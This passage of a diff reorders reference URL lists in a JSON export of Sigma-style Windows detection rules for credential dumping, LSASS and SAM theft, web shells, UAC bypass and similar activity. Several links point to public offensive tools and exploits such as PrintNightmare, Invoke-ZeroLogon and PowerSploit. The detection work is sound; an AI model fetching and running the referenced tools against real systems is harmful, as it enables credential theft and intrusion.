"https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/luc4m/status/1073181154126254080", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ @@ -30650,8 +30674,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" ], "tags": [ @@ -30786,11 +30810,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/helpsystems/nanodump", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://github.com/helpsystems/nanodump", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://www.google.com/search?q=procdump+lsass", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ @@ -30951,10 +30975,10 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/luc4m/status/1073181154126254080", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ @@ -31286,9 +31310,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/afwu/PrintNightmare", "https://github.com/cube0x0/CVE-2021-1675", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -31638,9 +31662,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", - "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" ], "tags": [ @@ -31765,11 +31789,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ @@ -31851,21 +31875,21 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/HarmJ0y/DAMP", "https://github.com/samratashok/nishang", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/NetSPI/PowerUpSQL", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ @@ -31898,9 +31922,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" ], "tags": [ @@ -32093,8 +32117,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://persistence-info.github.io/Data/powershellprofile.html", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ @@ -32453,9 +32477,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", - "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -32488,9 +32512,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ @@ -32514,9 +32538,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ @@ -32538,8 +32562,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -32613,8 +32637,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ @@ -32747,8 +32771,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" ], "tags": [ @@ -32831,8 +32855,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" ], "tags": [ @@ -32958,8 +32982,8 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" ], @@ -32993,9 +33017,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], "tags": [ @@ -33062,8 +33086,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" ], "tags": [ @@ -33153,8 +33177,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1278977301745741825", "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" ], "tags": [ @@ -33221,11 +33245,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0/CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", - "https://github.com/search?q=CVE-2021-36934", - "https://github.com/HuskyHacks/ShadowSteal", "https://github.com/FireFart/hivenightmare", + "https://github.com/search?q=CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/cube0x0/CVE-2021-36934", + "https://github.com/HuskyHacks/ShadowSteal", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ @@ -33375,10 +33399,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/WiredPulse/Invoke-HiveNightmare", - "https://github.com/FireFart/hivenightmare/", - "https://github.com/GossiTheDog/HiveNightmare", "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://github.com/GossiTheDog/HiveNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ @@ -33470,9 +33494,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" ], "tags": [ @@ -33572,8 +33596,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" ], "tags": [ @@ -33755,9 +33779,9 @@ "logsource.product": "windows", "refs": [ "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], "tags": "No established tags" @@ -33812,8 +33836,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" ], "tags": [ @@ -33897,9 +33921,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/fox-it/LDAPFragger", "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" ], "tags": [ @@ -33932,8 +33956,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" ], "tags": [ @@ -34273,11 +34297,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://github.com/Wh04m1001/SysmonEoP", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/Wh04m1001/SysmonEoP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ @@ -34373,8 +34397,8 @@ "logsource.product": "windows", "refs": [ "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", - "http://addbalance.com/word/startup.htm", "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "http://addbalance.com/word/startup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ @@ -34465,8 +34489,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://twitter.com/cyb3rops/status/1552932770464292864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ @@ -34517,8 +34541,8 @@ "logsource.category": "file_rename", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" ], "tags": [ @@ -34886,8 +34910,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://github.com/lclevy/firepwd", "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" ], "tags": [ @@ -35011,8 +35035,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://twitter.com/notwhickey/status/1333900137232523264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml" ], "tags": [ @@ -35111,10 +35135,10 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", - "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], "tags": [ @@ -35455,8 +35479,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_tamper_defender.yml" ], "tags": [ @@ -35613,8 +35637,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://nsudo.m2team.org/en-us/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" ], "tags": [ @@ -35747,8 +35771,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -35845,10 +35869,10 @@ "refs": [ "https://twitter.com/eral4m/status/1479106975967240209", "https://twitter.com/nas_bench/status/1433344116071583746", - "https://twitter.com/Hexacorn/status/885258886428725250", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://twitter.com/eral4m/status/1479080793003671557", + "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" ], "tags": [ @@ -35981,9 +36005,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", - "https://securelist.com/my-name-is-dtrack/93338/", "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", + "https://securelist.com/my-name-is-dtrack/93338/", + "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" ], "tags": [ @@ -36074,8 +36098,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" ], "tags": [ @@ -36157,8 +36181,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" ], "tags": [ @@ -36303,9 +36327,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/frack113/status/1555830623633375232", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" ], "tags": [ @@ -36482,9 +36506,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://twitter.com/countuponsec/status/910977826853068800", "https://twitter.com/countuponsec/status/910969424215232518", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ @@ -36575,8 +36599,8 @@ "logsource.product": "windows", "refs": [ "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", + "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" ], "tags": [ @@ -36657,8 +36681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" ], "tags": [ @@ -36691,9 +36715,9 @@ 